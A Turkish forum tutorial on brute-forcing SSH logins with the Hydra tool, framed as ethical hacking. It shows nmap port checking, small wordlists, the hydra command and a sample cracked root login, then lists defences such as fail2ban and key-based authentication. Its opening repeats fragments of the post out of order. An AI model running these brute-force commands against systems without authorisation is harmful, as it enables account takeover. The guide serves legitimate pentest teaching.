Merhabalar!
Ben @Sarraf, Lojistik grup adına paylaşılan Hydra ile SSH Brute Force Saldırısı: Etik Hacking Rehberi makalesinde sizi görmekten mutluyum.
Eğer hazırsanız, başlayalım!
Çıktı şöyle olmalıdır:
Bu dosyalar genellikle /usr/share/wordlists dizininde de hazır bulunur (örneğin: rockyou.txt).
Açıklaması:
Bu noktada sisteminize etik kurallar çerçevesinde erişim sağlanabilir.
Hydra, güçlü bir brute-force aracıdır ve sistemlerin parola güvenliğini test etmek için oldukça etkilidir. Ancak sorumlu ve etik kullanım en önemli kuraldır. Her zaman sadece izinli sistemler üzerinde test yapılmalıdır.
Makalemizi okuduğunuz için teşekkür ederiz!
Yorum yapmayı ve beğenmeyi unutmayın!
Ben @Sarraf, Lojistik grup adına paylaşılan Hydra ile SSH Brute Force Saldırısı: Etik Hacking Rehberi makalesinde sizi görmekten mutluyum.
Eğer hazırsanız, başlayalım!
Hydra ile SSH Brute Force Saldırısı: Etik Hacking Rehberi
Hydra Nedir?
Hydra, çeşitli protokoller (FTP, SSH, HTTP, Telnet, RDP vb.) üzerinde brute-force saldırıları yapabilen açık kaynaklı bir araçtır. Özellikle parola güvenliğini test etmek isteyen sızma testi uzmanları tarafından kullanılır.
Gerekli Araçlar
- Kali Linux (veya herhangi bir Linux dağıtımı)
- Hydra (genellikle Kali'de yüklü gelir)
- Hedef SSH servisi (izinli bir test sistemi)
Hedefin SSH Servisini Doğrulama
Öncelikle hedef IP’de SSH servisinin çalıştığını doğrulayalım:
Kod:
bash
nmap -p 22 <hedef_ip>
Çıktı şöyle olmalıdır:
Kod:
arduino
22/tcp open ssh
Kullanıcı Adı ve Parola Listeleri
Brute-force işlemi için kullanıcı adı ve parola listeleri gereklidir. Örnek:
Kod:
bash
nano users.txt
admin
root
test
Kod:
bash
nano passwords.txt
123456
password
admin123
Bu dosyalar genellikle /usr/share/wordlists dizininde de hazır bulunur (örneğin: rockyou.txt).
Hydra ile SSH Brute-Force Saldırısı
Komut örneği:
Kod:
bash
hydra -L users.txt -P passwords.txt ssh://<hedef_ip>
Açıklaması:
- -L: Kullanıcı adı listesi
- -P: Parola listesi
- ssh://: Protokol
- <hedef_ip>: Hedef sistemin IP adresi
Örnek:
Kod:
bash
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
Başarılı Sonuç Çıktısı
Hydra başarılı bir eşleşme bulduğunda aşağıdaki gibi bir çıktı verir:
Kod:
css
[22][ssh] host: 192.168.1.10 login: root password: admin123
Bu noktada sisteminize etik kurallar çerçevesinde erişim sağlanabilir.
Güvenlik Önlemleri
Sistem yöneticileri brute-force saldırılarına karşı şu önlemleri almalıdır:- SSH için fail2ban veya benzeri araçlarla brute-force koruması
- Karmaşık ve uzun parolalar
- SSH anahtar doğrulaması (key-based auth)
- SSH portunu değiştirmek
- IP erişim kısıtlamaları
Hydra, güçlü bir brute-force aracıdır ve sistemlerin parola güvenliğini test etmek için oldukça etkilidir. Ancak sorumlu ve etik kullanım en önemli kuraldır. Her zaman sadece izinli sistemler üzerinde test yapılmalıdır.
Makalemizi okuduğunuz için teşekkür ederiz!
Yorum yapmayı ve beğenmeyi unutmayın!
LOJİSTİK TİM SUNDU




